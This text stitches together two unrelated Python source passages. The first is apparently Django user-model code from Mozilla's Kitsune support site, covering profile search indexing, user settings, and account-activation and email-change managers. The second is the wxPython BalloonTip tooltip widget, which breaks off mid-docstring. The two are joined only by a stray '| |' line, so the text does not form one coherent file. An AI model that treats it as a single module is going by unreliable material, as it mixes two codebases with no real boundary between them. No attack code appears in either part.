obj = model.objects.select_related('user').get(pk=obj_id)
if not obj.user.is_active:
raise UnindexMeBro()
d = {}
d['id'] = obj.pk
d['model'] = cls.get_mapping_type_name()
d['url'] = obj.get_absolute_url()
d['indexed_on'] = int(time.time())
d['username'] = obj.user.username
d['display_name'] = obj.display_name
d['twitter_usernames'] = obj.twitter_usernames
d['last_contribution_date'] = obj.last_contribution_date
d['iusername'] = obj.user.username.lower()
d['idisplay_name'] = obj.display_name.lower()
d['itwitter_usernames'] = [u.lower() for u in obj.twitter_usernames]
from kitsune.users.helpers import profile_avatar
d['avatar'] = profile_avatar(obj.user, size=120)
d['suggest'] = {
'input': [
d['iusername'],
d['idisplay_name']
],
'output': _(u'{displayname} ({username})').format(
displayname=d['display_name'], username=d['username']),
'payload': {'user_id': d['id']},
}
return d
@classmethod
def suggest_completions(cls, text):
"""Suggest completions for the text provided."""
USER_SUGGEST = 'user-suggest'
es = UserMappingType.search().get_es()
results = es.suggest(index=cls.get_index(), body={
USER_SUGGEST: {
'text': text.lower(),
'completion': {
'field': 'suggest'
}
}
})
if results[USER_SUGGEST][0]['length'] > 0:
return results[USER_SUGGEST][0]['options']
return []
register_for_indexing('users', Profile)
def get_profile(u):
try:
return Profile.objects.get(user=u)
except Profile.DoesNotExist:
return None
register_for_indexing(
'users',
User,
instance_to_indexee=get_profile)
class Setting(ModelBase):
"""User specific value per setting"""
user = models.ForeignKey(User, verbose_name=_lazy(u'User'),
related_name='settings')
name = models.CharField(max_length=100)
value = models.CharField(blank=True, max_length=60,
verbose_name=_lazy(u'Value'))
class Meta(object):
unique_together = (('user', 'name'),)
def __unicode__(self):
return u'%s %s:%s' % (self.user, self.name, self.value or u'[none]')
@classmethod
def get_for_user(cls, user, name):
from kitsune.users.forms import SettingsForm
form = SettingsForm()
if name not in form.fields.keys():
raise KeyError(("'{name}' is not a field in "
"user.forms.SettingsFrom()").format(name=name))
try:
setting = Setting.objects.get(user=user, name=name)
except Setting.DoesNotExist:
value = form.fields[name].initial or ''
setting = Setting.objects.create(user=user, name=name, value=value)
# Cast to the field's Python type.
return form.fields[name].to_python(setting.value)
# Activation model and manager:
# (based on http://bitbucket.org/ubernostrum/django-registration)
class ConfirmationManager(models.Manager):
"""
Custom manager for confirming keys sent by email.
The methods defined here provide shortcuts for creation of instances
and sending email confirmations.
Activation should be done in specific managers.
"""
def _send_email(self, confirmation_profile, url,
subject, text_template, html_template,
send_to, **kwargs):
"""
Send an email using a passed in confirmation profile.
Use specified url, subject, text_template, html_template and
email to send_to.
"""
current_site = Site.objects.get_current()
email_kwargs = {'activation_key': confirmation_profile.activation_key,
'domain': current_site.domain,
'activate_url': url,
'login_url': reverse('users.login'),
'reg': 'main'}
email_kwargs.update(kwargs)
# RegistrationProfile doesn't have a locale attribute. So if
# we get one of those, then we have to get the real profile
# from the user.
if hasattr(confirmation_profile, 'locale'):
locale = confirmation_profile.locale
else:
locale = confirmation_profile.user.profile.locale
@email_utils.safe_translation
def _make_mail(locale):
mail = email_utils.make_mail(
subject=subject,
text_template=text_template,
html_template=html_template,
context_vars=email_kwargs,
from_email=settings.DEFAULT_FROM_EMAIL,
to_email=send_to)
return mail
email_utils.send_messages([_make_mail(locale)])
def send_confirmation_email(self, *args, **kwargs):
"""This is meant to be overwritten."""
raise NotImplementedError
def create_profile(self, user, *args, **kwargs):
"""
Create an instance of this manager's object class for a given
``User``, and return it.
The activation key will be a SHA1 hash, generated from a combination
of the ``User``'s username and a random salt.
"""
salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
activation_key = hashlib.sha1(salt + user.username).hexdigest()
return self.create(user=user, activation_key=activation_key, **kwargs)
class RegistrationManager(ConfirmationManager):
def get_user(self, activation_key):
"""Get the user for the specified activation_key."""
try:
profile = self.get(activation_key=activation_key)
return profile.user
except self.model.DoesNotExist:
return None
def activate_user(self, activation_key, request=None):
"""
Validate an activation key and activate the corresponding
``User`` if valid.
If the key is valid and has not expired, return the ``User``
after activating.
If the key is not valid or has expired, return ``False``.
"""
# Make sure the key we're trying conforms to the pattern of a
# SHA1 hash; if it doesn't, no point trying to look it up in
# the database.
if SHA1_RE.search(activation_key):
try:
profile = self.get(activation_key=activation_key)
except self.model.DoesNotExist:
profile = None
statsd.incr('user.activate-error.does-not-exist')
reason = 'key not found'
if profile:
if not profile.activation_key_expired():
user = profile.user
user.is_active = True
user.save()
# We don't need the RegistrationProfile anymore, delete it.
profile.delete()
# If user registered as contributor, send them the
# welcome email.
if user.groups.filter(name=CONTRIBUTOR_GROUP):
self._send_email(
confirmation_profile=profile,
url=None,
subject=_('Welcome to SUMO!'),
text_template='users/email/contributor.ltxt',
html_template='users/email/contributor.html',
send_to=user.email,
contributor=user)
return user
else:
statsd.incr('user.activate-error.expired')
reason = 'key expired'
else:
statsd.incr('user.activate-error.invalid-key')
reason = 'invalid key'
log.warning(u'User activation failure ({r}): {k}'.format(
r=reason, k=activation_key))
return False
def create_inactive_user(self, username, password, email,
locale=settings.LANGUAGE_CODE,
text_template=None, html_template=None,
subject=None, email_data=None,
volunteer_interest=False, **kwargs):
"""
Create a new, inactive ``User`` and ``Profile``, generates a
``RegistrationProfile`` and email its activation key to the
``User``, returning the new ``User``.
"""
new_user = User.objects.create_user(username, email, password)
new_user.is_active = False
new_user.save()
Profile.objects.create(user=new_user, locale=locale)
registration_profile = self.create_profile(new_user)
self.send_confirmation_email(
registration_profile,
text_template,
html_template,
subject,
email_data,
**kwargs)
if volunteer_interest:
statsd.incr('user.registered-as-contributor')
group = Group.objects.get(name=CONTRIBUTOR_GROUP)
new_user.groups.add(group)
return new_user
def send_confirmation_email(self, registration_profile,
text_template=None, html_template=None,
subject=None, email_data=None, **kwargs):
"""Send the user confirmation email."""
user_id = registration_profile.user.id
key = registration_profile.activation_key
self._send_email(
confirmation_profile=registration_profile,
url=reverse('users.activate', args=[user_id, key]),
subject=subject or _('Please confirm your email address'),
text_template=text_template or 'users/email/activate.ltxt',
html_template=html_template or 'users/email/activate.html',
send_to=registration_profile.user.email,
expiration_days=settings.ACCOUNT_ACTIVATION_DAYS,
username=registration_profile.user.username,
email_data=email_data,
**kwargs)
def delete_expired_users(self):
"""
Remove expired instances of this manager's object class.
Accounts to be deleted are identified by searching for
instances of this manager's object class with expired activation
keys, and then checking to see if their associated ``User``
instances have the field ``is_active`` set to ``False``; any
``User`` who is both inactive and has an expired activation
key will be deleted.
"""
days_valid = settings.ACCOUNT_ACTIVATION_DAYS
expired = datetime.now() - timedelta(days=days_valid)
prof_ids = self.filter(user__date_joined__lt=expired)
prof_ids = prof_ids.values_list('id', flat=True)
for chunk in chunked(prof_ids, 1000):
_delete_registration_profiles_chunk.apply_async(args=[chunk])
@task
def _delete_registration_profiles_chunk(data):
log_msg = u'Deleting {num} expired registration profiles.'
log.info(log_msg.format(num=len(data)))
qs = RegistrationProfile.objects.filter(id__in=data)
for profile in qs.select_related('user'):
user = profile.user
profile.delete()
if user and not user.is_active:
user.delete()
class EmailChangeManager(ConfirmationManager):
def send_confirmation_email(self, email_change, new_email):
"""Ask for confirmation before changing a user's email."""
self._send_email(
confirmation_profile=email_change,
url=reverse('users.confirm_email',
args=[email_change.activation_key]),
subject=_('Please confirm your email address'),
text_template='users/email/confirm_email.ltxt',
html_template='users/email/confirm_email.html',
send_to=new_email)
class RegistrationProfile(models.Model):
"""
A simple profile which stores an activation key used for
user account registration.
Generally, you will not want to interact directly with instances
of this model; the provided manager includes methods
for creating and activating new accounts.
"""
user = models.ForeignKey(User, unique=True, verbose_name=_lazy(u'user'))
activation_key = models.CharField(verbose_name=_lazy(u'activation key'),
max_length=40)
objects = RegistrationManager()
class Meta:
verbose_name = _lazy(u'registration profile')
verbose_name_plural = _lazy(u'registration profiles')
def __unicode__(self):
return u'Registration information for %s' % self.user
def activation_key_expired(self):
"""
Determine whether this ``RegistrationProfile``'s activation
key has expired, returning a boolean -- ``True`` if the key
has expired.
Key expiration is determined by:
1. The date the user signed up is incremented by
the number of days specified in the setting
``ACCOUNT_ACTIVATION_DAYS`` (which should be the number of
days after signup during which a user is allowed to
activate their account); if the result is less than or
equal to the current date, the key has expired and this
method returns ``True``.
"""
exp_date = timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS)
return self.user.date_joined + exp_date <= datetime.now()
activation_key_expired.boolean = True
class EmailChange(models.Model):
"""Stores email with activation key when user requests a change."""
ACTIVATED = u"ALREADY_ACTIVATED"
user = models.ForeignKey(User, unique=True, verbose_name=_lazy(u'user'))
activation_key = models.CharField(verbose_name=_lazy(u'activation key'),
max_length=40)
email = models.EmailField(db_index=True, null=True)
objects = EmailChangeManager()
def __unicode__(self):
return u'Change email request to %s for %s' % (self.email, self.user)
class Deactivation(models.Model):
"""Stores user deactivation logs."""
user = models.ForeignKey(User, verbose_name=_lazy(u'user'),
related_name='+')
moderator = models.ForeignKey(User, verbose_name=_lazy(u'moderator'),
related_name='deactivations')
date = models.DateTimeField(default=datetime.now)
def __unicode__(self):
return u'%s was deactivated by %s on %s' % (self.user, self.moderator,
self.date)
| |
# --------------------------------------------------------------------------- #
# BALLOONTIP wxPython IMPLEMENTATION
# Python Code By:
#
# Andrea Gavana, @ 29 May 2005
# Latest Revision: 23 Nov 2009, 09.00 GMT
#
#
# TODO List/Caveats
#
# 1. With wx.ListBox (And Probably Other Controls), The BalloonTip Sometimes
# Flashes (It Is Created And Suddenly Destroyed). I Don't Know What Is
# Happening. Probably I Don't Handle Correctly The wx.EVT_ENTER_WINDOW
# wx.EVT_LEAVE_WINDOW?
#
# 2. wx.RadioBox Seems Not To Receive The wx.EVT_ENTER_WINDOW Event
#
# 3. wx.SpinCtrl (And Probably Other Controls), When Put In A Sizer, Does Not
# Return The Correct Size/Position. Probably Is Something I Am Missing.
#
# 4. Other Issues?
#
#
# FIXED Problems
#
# 1. Now BalloonTip Control Works Also For TaskBarIcon (Thanks To Everyone
# For The Suggetions I Read In The wxPython Mailing List)
#
#
# For All Kind Of Problems, Requests Of Enhancements And Bug Reports, Please
# Write To Me At:
#
# andrea.gavana@gmail.com
# gavana@kpo.kz
#
# Or, Obviously, To The wxPython Mailing List!!!
#
#
# End Of Comments
# --------------------------------------------------------------------------- #
"""
BalloonTip is a class that allows you to display tooltips in a balloon style
window.
Description
===========
BalloonTip is a class that allows you to display tooltips in a balloon style
window (actually a frame), similarly to the windows XP balloon help. There is
also an arrow that points to the center of the control designed as a "target"
for the BalloonTip.
What it can do:
- Set the balloon shape as a rectangle or a rounded rectangle;
- Set an icon to the top-left of the BalloonTip frame;
- Set a title at the top of the BalloonTip frame;
- Automatic "best" placement of BalloonTip frame depending on the target
control/window position;
- Runtime customization of title/tip fonts and foreground colours;
- Runtime change of BalloonTip frame shape;
- Set the balloon background colour;
- Possibility to set the delay after which the BalloonTip is displayed;
- Possibility to set the delay after which the BalloonTip is destroyed;
- Three different behaviors for the BalloonTip window (regardless the delay
destruction time set):
a) Destroy by leave: the BalloonTip is destroyed when the mouse leaves the
target control/window;
b) Destroy by click: the BalloonTip is destroyed when you click on any area
of the target control/window;
c) Destroy by button: the BalloonTip is destroyed when you click on the
top-right close button;
- Possibility to enable/disable globally the BalloonTip on you application;
- Set the BalloonTip also for the taskbar icon.
Usage
=====
Usage example::
# let's suppose that in your application you have a wx.TextCtrl defined as:
mytextctrl = wx.TextCtrl(panel, -1, "i am a textctrl")
# you can define your BalloonTip as follows:
tipballoon = BalloonTip(topicon=None, toptitle="textctrl",
message="this is a textctrl",
shape=BT_ROUNDED,
tipstyle=BT_LEAVE)
# set the BalloonTip target
tipballoon.SetTarget(mytextctrl)
# set the BalloonTip background colour
tipballoon.SetBalloonColour(wx.white)
# set the font for the balloon title
tipballoon.SetTitleFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
# set the colour for the balloon title
tipballoon.SetTitleColour(wx.BLACK)
# leave the message font as default
tipballoon.SetMessageFont()
# set the message (tip) foreground colour
tipballoon.SetMessageColour(wx.LIGHT_GREY)
# set the start delay for the BalloonTip
tipballoon.SetStartDelay(1000)
# set the time after which the BalloonTip is destroyed
tipballoon.SetEndDelay(3000)
Window Styles
=============
This class supports the following window styles:
================ =========== ==================================================
Window Styles Hex Value Description
================ =========== ==================================================
``BT_ROUNDED`` 0x1 `BalloonTip` will have a rounded rectangular shape.
``BT_RECTANGLE`` 0x2 `BalloonTip` will have a rectangular shape.
``BT_LEAVE`` 0x3 `BalloonTip` will be destroyed when the user moves the mouse outside the target window.
``BT_CLICK`` 0x4 `BalloonTip` will be destroyed when the user click on `BalloonTip`.
``BT_BUTTON`` 0x5 `BalloonTip` will be destroyed when the user click on the close button.
================ =========== ==================================================
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
BalloonTip is distributed under the wxPython license.
Latest revision: Andrea Gavana @ 23 Nov 2009, 09.00 GMT
Version 0.2
"""
import wx
import time
from wx.lib.buttons import GenButton
# Define The Values For The BalloonTip Frame Shape
BT_ROUNDED = 1
""" `BalloonTip` will have a rounded rectangular shape. """
BT_RECTANGLE = 2
""" `BalloonTip` will have a rectangular shape. """
# Define The Value For The BalloonTip Destruction Behavior
BT_LEAVE = 3
""" `BalloonTip` will be destroyed when the user moves the mouse outside the target window. """
BT_CLICK = 4
""" `BalloonTip` will be destroyed when the user click on `BalloonTip`. """
BT_BUTTON = 5
""" `BalloonTip` will be destroyed when the user click on the close button. """
# ---------------------------------------------------------------
# Class BalloonFrame
# ---------------------------------------------------------------
# This Class Is Called By The Main BalloonTip Class, And It Is
# Responsible For The Frame Creation/Positioning On Screen
# Depending On Target Control/Window, The Frame Can Position
# Itself To NW (Default), NE, SW, SE. The Switch On Positioning
# Is Done By Calculating The Absolute Position Of The Target
# Control/Window Plus/Minus The BalloonTip Size. The Pointing
# Arrow Is Positioned Accordingly.
# ---------------------------------------------------------------
class BalloonFrame(wx.Frame):
"""
This class is called by the main L{BalloonTip} class, and it is
responsible for the frame creation/positioning on screen
depending on target control/window, the frame can position
itself to NW (default), NE, SW, SE. The switch on positioning
is done by calculating the absolute position of the target
control/window plus/minus the balloontip size. The pointing
arrow is positioned accordingly.
"""
def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
size=wx.DefaultSize, classparent=None):
"""
Default class constructor.
Used internally. Do not call directly this class in your application!
"""
wx.Frame.__init__(self, None, -1, "BalloonTip", pos, size,
style=wx.FRAME_SHAPED |
wx.SIMPLE_BORDER |
wx.FRAME_NO_TASKBAR |
wx.STAY_ON_TOP)
self._parent = classparent
self._toptitle = self._parent._toptitle
self._topicon = self._parent._topicon
self._message = self._parent._message
self._shape = self._parent._shape
self._tipstyle = self._parent._tipstyle
self._ballooncolour = self._parent._ballooncolour
self._balloonmsgcolour = self._parent._balloonmsgcolour
self._balloonmsgfont = self._parent._balloonmsgfont
if self._toptitle != "":
self._balloontitlecolour = self._parent._balloontitlecolour
self._balloontitlefont = self._parent._balloontitlefont
panel = wx.Panel(self, -1)
sizer = wx.BoxSizer(wx.VERTICAL)
self.panel = panel
subsizer = wx.BoxSizer(wx.VERTICAL)
hsizer = wx.BoxSizer(wx.HORIZONTAL)
subsizer.Add((0,20), 0, wx.EXPAND)
if self._topicon is not None:
stb = wx.StaticBitmap(panel, -1, self._topicon)
hsizer.Add(stb, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)
self._balloonbmp = stb
if self._toptitle != "":
stt = wx.StaticText(panel, -1, self._toptitle)
stt.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
if self._topicon is None:
hsizer.Add((10,0), 0, wx.EXPAND)
hsizer.Add(stt, 1, wx.EXPAND | wx.TOP, 10)
self._balloontitle = stt
self._balloontitle.SetForegroundColour(self._balloontitlecolour)
self._balloontitle.SetFont(self._balloontitlefont)
if self._tipstyle == BT_BUTTON:
self._closebutton = GenButton(panel, -1, "X", style=wx.NO_BORDER)
self._closebutton.SetMinSize((16,16))
self._closebutton.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
self._closebutton.Bind(wx.EVT_ENTER_WINDOW, self.OnEnterButton)
self._closebutton.Bind(wx.EVT_LEAVE_WINDOW, self.OnLeaveButton)
self._closebutton.SetUseFocusIndicator(False)
if self._toptitle != "":
hsizer.Add(self._closebutton, 0, wx.TOP | wx.RIGHT, 5)
else:
hsizer.Add((10,0), 1, wx.EXPAND)
hsizer.Add(self._closebutton, 0, wx.ALIGN_RIGHT | wx.TOP
| wx.RIGHT, 5)
if self._topicon is not None or self._toptitle != "" \
or self._tipstyle == BT_BUTTON:
subsizer.Add(hsizer, 0, wx.EXPAND | wx.BOTTOM, 5)
self._firstline = line = wx.StaticLine(panel, -1, style=wx.LI_HORIZONTAL)
if self._topicon is not None or self._toptitle != "" \
or self._tipstyle == BT_BUTTON:
subsizer.Add(self._firstline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT
| wx.BOTTOM, 10)
else:
subsizer.Add(self._firstline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT
| wx.BOTTOM | wx.TOP, 10)
mainstt = wx.StaticText(panel, -1, self._message)
self._balloonmsg = mainstt
self._balloonmsg.SetForegroundColour(self._balloonmsgcolour)
self._balloonmsg.SetFont(self._balloonmsgfont)
subsizer.Add(self._balloonmsg, 1, wx.EXPAND | wx.LEFT | wx.RIGHT |
wx.BOTTOM, 10)
self._secondline = wx.StaticLine(panel, -1, style=wx.LI_HORIZONTAL)
subsizer.Add(self._secondline, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)
subsizer.Add((0,0),1)
panel.SetSizer(subsizer)
sizer.Add(panel, 1, wx.EXPAND)
self.SetSizerAndFit(sizer)
sizer.Layout()
if self._tipstyle == BT_CLICK:
if self._toptitle != "":
self._balloontitle.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
if self._topicon is not None:
self._balloonbmp.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
self._balloonmsg.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
self.panel.Bind(wx.EVT_LEFT_DOWN, self.OnClose)
elif self._tipstyle == BT_BUTTON:
self._closebutton.Bind(wx.EVT_BUTTON, self.OnClose)
self.panel.SetBackgroundColour(self._ballooncolour)
if wx.Platform == "__WXGTK__":
self.Bind(wx.EVT_WINDOW_CREATE, self.SetBalloonShape)
else:
self.SetBalloonShape()
self.Show(True)
def SetBalloonShape(self, event=None):
"""
Sets the balloon shape.
:param `event`: on wxGTK, a `wx.WindowCreateEvent` event to process.
"""
size = self.GetSize()
pos = self.GetPosition()
dc = wx.MemoryDC(wx.EmptyBitmap(1,1))
textlabel = self._balloonmsg.GetLabel()
textfont = self._balloonmsg.GetFont()
textextent = dc.GetFullTextExtent(textlabel, textfont)
boxheight = size.y - textextent[1]*len(textlabel.split("\n"))
boxwidth = size.x
position = wx.GetMousePosition()
xpos = position[0]
ypos = position[1]
if xpos > 20 and ypos > 20:
# This Is NW Positioning
positioning = "NW"
xpos = position[0] - boxwidth + 20
ypos = position[1] - boxheight - 20
elif xpos <= 20 and ypos <= 20:
# This Is SE Positioning
positioning = "SE"
xpos = position[0] - 20
ypos = position[1]
elif xpos > 20 and ypos <= 20:
# This Is SW Positioning
positioning = "SW"
xpos = position[0] - boxwidth + 20
ypos = position[1]
else:
# This Is NE Positioning
positioning = "NE"
xpos = position[0]
ypos = position[1] - boxheight + 20
bmp = wx.EmptyBitmap(size.x,size.y)
dc = wx.BufferedDC(None, bmp)
dc.BeginDrawing()
dc.SetBackground(wx.Brush(wx.Colour(0,0,0), wx.SOLID))
dc.Clear()
dc.SetPen(wx.Pen(wx.Colour(0,0,0), 1, wx.TRANSPARENT))
if self._shape == BT_ROUNDED:
dc.DrawRoundedRectangle(0, 20, boxwidth, boxheight-20, 12)
elif self._shape == BT_RECTANGLE:
dc.DrawRectangle(0, 20, boxwidth, boxheight-20)
if positioning == "NW":
dc.DrawPolygon(((boxwidth-40, boxheight), (boxwidth-20, boxheight+20),
(boxwidth-20, boxheight)))
elif positioning == "SE":
dc.DrawPolygon(((20, 20), (20, 0), (40, 20)))
elif positioning == "SW":
dc.DrawPolygon(((boxwidth-40, 20), (boxwidth-20, 0), (boxwidth-20, 20)))
else:
dc.DrawPolygon(((20, boxheight), (20, boxheight+20), (40, boxheight)))
dc.EndDrawing()
r = wx.RegionFromBitmapColour(bmp, wx.Colour(0,0,0))
self.hasShape = self.SetShape(r)
if self._tipstyle == BT_BUTTON:
colour = self.panel.GetBackgroundColour()
self._closebutton.SetBackgroundColour(colour)
self.SetPosition((xpos, ypos))
def OnEnterButton(self, event):
"""
Handles the ``wx.EVT_ENTER_WINDOW`` for the L{BalloonTip} button.
When the L{BalloonTip} is created with the `tipstyle` = ``BT_BUTTON``, this event
provide some kind of 3D effect when the mouse enters the button area.
:param `event`: a `wx.MouseEvent` event to be processed.
"""
button = event.GetEventObject()
colour = button.GetBackgroundColour()
red = colour.Red()
green = colour.Green()
blue = colour.Blue()
if red < 30:
red = red + 30
if green < 30:
green = green + 30
if blue < 30:
blue = blue + 30
colour = wx.Colour(red-30, green-30, blue-30)
button.SetBackgroundColour(colour)
button.SetForegroundColour(wx.WHITE)
button.Refresh()
event.Skip()
def OnLeaveButton(self, event):
"""
Handles the ``wx.EVT_LEAVE_WINDOW`` for the L{BalloonTip} button.
When the L{BalloonTip} is created with the `tipstyle` = ``BT_BUTTON``, this event
provide some kind of 3D effect when the mouse enters the button area.
:param `event`: a `wx.MouseEvent` event to be processed.
"""
button = event.GetEventObject()
colour = self.panel.GetBackgroundColour()
button.SetBackgroundColour(colour)
button.SetForegroundColour(wx.BLACK)
button.Refresh()
event.Skip()
def OnClose(self, event):
"""
Handles the ``wx.EVT_CLOSE`` event for L{BalloonTip}.
:param `event`: a `wx.CloseEvent` event to be processed.
"""
if isinstance(self._parent._widget, wx.TaskBarIcon):
self._parent.taskbarcreation = 0
self._parent.taskbartime.Stop()
del self._parent.taskbartime
del self._parent.BalloonFrame
self.Destroy()
# ---------------------------------------------------------------
# Class BalloonTip
# ---------------------------------------------------------------
# This Is The Main BalloonTip Implementation
# ---------------------------------------------------------------
class BalloonTip(object):
"""
BalloonTip is a class that allows you to display tooltips in a balloon style
window.
This is the main class implementation.
"""
def __init__(self, topicon=None, toptitle="",
message="", shape=BT_ROUNDED, tipstyle=BT_LEAVE):
"""
Default class constructor.
:param `topicon`: an icon that will be displayed on the top-left part of the
L{BalloonTip} frame. If set to ``None``, no icon will be displayed;
:param `toptitle`: a title that will be displayed on the top part of the
L{BalloonTip} frame. If set to an empty string, no title will be displayed;
:param `message`: the tip message that will be displayed. It can not be set to
an empty string;
:param `shape`: the L{BalloonTip} shape. It can be one of the following:
======================= ========= ====================================
Shape Flag Hex Value Description
======================= ========= ====================================
``BT_ROUNDED`` 0x1 `BalloonTip` will have a rounded rectangular shape.
``BT_RECTANGLE`` 0x2 `BalloonTip` will have a rectangular shape.
======================= ========= ====================================
:param `tipstyle`: the L{BalloonTip} destruction behavior. It can be one of:
======================= ========= ====================================
Tip Flag Hex Value Description
======================= ========= ====================================
``BT_LEAVE`` 0x3 `BalloonTip` will be destroyed when the user moves the mouse outside the target window.
``BT_CLICK`` 0x4 `BalloonTip` will be destroyed when the user click on `BalloonTip`.
``BT_BUTTON`` 0x5 `BalloonTip` will be destroyed when the user click on the close button.
======================= ========= ====================================
"""
self._shape = shape
self._topicon = topicon
self._toptitle = toptitle
self._message = message
self._tipstyle = tipstyle
app = wx.GetApp()
self._runningapp = app
self._runningapp.__tooltipenabled__ = True
if self._message == "":
raise Exception("\nERROR: You Should At Least Set The Message For The BalloonTip")
if self._shape not in [BT_ROUNDED, BT_RECTANGLE]:
raise Exception('\nERROR: BalloonTip Shape Should Be One Of "BT_ROUNDED", "BT_RECTANGLE"')
if self._tipstyle not in [BT_LEAVE, BT_CLICK, BT_BUTTON]:
raise Exception('\nERROR: BalloonTip TipStyle Should Be One Of "BT_LEAVE", '\
'"BT_CLICK", "BT_BUTTON"')
self.SetStartDelay()
self.SetEndDelay()
self.SetBalloonColour()
if toptitle != "":
self.SetTitleFont()
self.SetTitleColour()
if topicon is not None:
self.SetBalloonIcon(topicon)
self.SetMessageFont()
self.SetMessageColour()
def SetTarget(self, widget):
"""
Sets the target control/window for the BalloonTip.
:param `widget`: an instance of `wx.Window`.
"""
self._widget = widget
if isinstance(widget, wx.TaskBarIcon):
self._widget.Bind(wx.EVT_TASKBAR_MOVE, self.OnTaskBarMove)
self._widget.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroy)
self.taskbarcreation = 0
else:
self._widget.Bind(wx.EVT_ENTER_WINDOW, self.OnWidgetEnter)
self._widget.Bind(wx.EVT_LEAVE_WINDOW, self.OnWidgetLeave)
self._widget.Bind(wx.EVT_MOTION, self.OnWidgetMotion)
self._widget.Bind(wx.EVT_WINDOW_DESTROY, self.OnDestroy)
def GetTarget(self):
""" Returns the target window for the L{BalloonTip}."""
if not hasattr(self, "_widget"):
raise Exception("\nERROR: BalloonTip Target Has Not Been Set")
return self._widget
def SetStartDelay(self, delay=1):
"""
Sets the delay time after which the L{BalloonTip} is created.
:param `delay`: the number of milliseconds after which L{BalloonTip} is created.
"""
if delay < 1:
raise Exception("\nERROR: Delay Time For BalloonTip Creation Should Be Greater Than 1 ms")
self._startdelaytime = float(delay)
def GetStartDelay(self):
""" Returns the delay time after which the L{BalloonTip} is created."""
return self._startdelaytime
def SetEndDelay(self, delay=1e6):
"""
Sets the delay time after which the BalloonTip is destroyed.
:param `delay`: the number of milliseconds after which L{BalloonTip} is destroyed.
"""
if delay < 1:
raise Exception("\nERROR: Delay Time For BalloonTip Destruction Should Be Greater Than 1 ms")
self._enddelaytime = float(delay)
def GetEndDelay(self):
""" Returns the delay time after which the L{BalloonTip} is destroyed."""
return self._enddelaytime
def OnWidgetEnter(self, event):
"""
Handles the ``wx.EVT_ENTER_WINDOW`` for the target control/window and
starts the L{BalloonTip} timer for creation.
:param `event`: a `wx.MouseEvent` event to be processed.
"""
if hasattr(self, "BalloonFrame"):
if self.BalloonFrame:
return
if not self._runningapp.__tooltipenabled__:
return
self.showtime = wx.PyTimer(self.NotifyTimer)
self.showtime.Start(self._startdelaytime)
event.Skip()
def OnWidgetLeave(self, event):
"""
Handles the ``wx.EVT_LEAVE_WINDOW`` for the target control/window.
:param `event`: a `wx.MouseEvent` event to be processed.
:note: If the BalloonTip `tipstyle` is set to ``BT_LEAVE``, the L{BalloonTip} is destroyed.
"""
if hasattr(self, "showtime"):
if self.showtime:
self.showtime.Stop()
del self.showtime
if hasattr(self, "BalloonFrame"):
if self.BalloonFrame:
if self._tipstyle == BT_LEAVE:
endtime = time.time()
if endtime - self.starttime > 0.1:
try:
self.BalloonFrame.Destroy()
except:
pass
else:
event.Skip()
else:
event.Skip()
else:
event.Skip()
def OnTaskBarMove(self, event):
"""
Handles the mouse motion inside the taskbar icon area.
:param `event`: a `wx.MouseEvent` event to be processed.
"""
if not hasattr(self, "BalloonFrame"):
if self.taskbarcreation == 0:
self.mousepos = wx.GetMousePosition()
self.currentmousepos = self.mousepos
self.taskbartime = wx.PyTimer(self.TaskBarTimer)
self.taskbartime.Start(100)
self.showtime = wx.PyTimer(self.NotifyTimer)
self.showtime.Start(self._startdelaytime)
if self.taskbarcreation == 0:
self.taskbarcreation = 1
return
event.Skip()
def OnWidgetMotion(self, event):
"""
Handle the mouse motion inside the target.
This prevents the annoying behavior of L{BalloonTip} to display when the
user does something else inside the window. The L{BalloonTip} window is
displayed only when the mouse does *not* move for the start delay time.
"""
if hasattr(self, "BalloonFrame"):
if self.BalloonFrame:
return
if hasattr(self, "showtime"):
if self.showtime:
self.showtime.Start(self._startdelaytime)
event.Skip()
def NotifyTimer(self):
""" The creation timer has expired. Creates the L{BalloonTip} frame."""
self.BalloonFrame = BalloonFrame(self._widget, classparent=self)
self.BalloonFrame.Show(True)
self.starttime = time.time()
self.showtime.Stop()
del self.showtime
self.destroytime = wx.PyTimer(self.DestroyTimer)
self.destroytime.Start(self._enddelaytime)
def TaskBarTimer(self):
"""
This timer check periodically the mouse position.
If the current mouse position is sufficiently far from the coordinates
it had when entered the taskbar icon and the L{BalloonTip} style is
``BT_LEAVE``, the L{BalloonTip} frame is destroyed.
"""
self.currentmousepos = wx.GetMousePosition()
mousepos = self.mousepos
if abs(self.currentmousepos[0] - mousepos[0]) > 30 or \
abs(self.currentmousepos[1] - mousepos[1]) > 30:
if hasattr(self, "BalloonFrame"):
if self._tipstyle == BT_LEAVE:
try:
self.BalloonFrame.Destroy()
self.taskbartime.Stop()
del self.taskbartime
del self.BalloonFrame
self.taskbarcreation = 0
except:
pass
def DestroyTimer(self):
""" The destruction timer has expired. Destroys the L{BalloonTip} frame."""
self.destroytime.Stop()
del self.destroytime
try:
self.BalloonFrame.Destroy()
except:
pass
def SetBalloonShape(self, shape=BT_ROUNDED):
"""
Sets the L{BalloonTip} frame shape.
:param `shape`: should be one of ``BT_ROUNDED`` or ``BT_RECTANGLE``.
"""
if shape not in [BT_ROUNDED, BT_RECTANGLE]:
raise Exception('\nERROR: BalloonTip Shape Should Be One Of "BT_ROUNDED", "BT_RECTANGLE"')
self._shape = shape
def GetBalloonShape(self):
""" Returns the L{BalloonTip} frame shape."""
return self._shape
def SetBalloonIcon(self, icon):
"""
Sets the L{BalloonTip} top-left icon.
:param `icon`: an instance of `wx.Bitmap`.
"""
if icon.Ok():
self._topicon = icon
else:
raise Exception("\nERROR: Invalid Image Passed To BalloonTip")
def GetBalloonIcon(self):
""" Returns the L{BalloonTip} top-left icon."""
return self._topicon
def SetBalloonTitle(self, title=""):
"""
Sets the L{BalloonTip} top title.
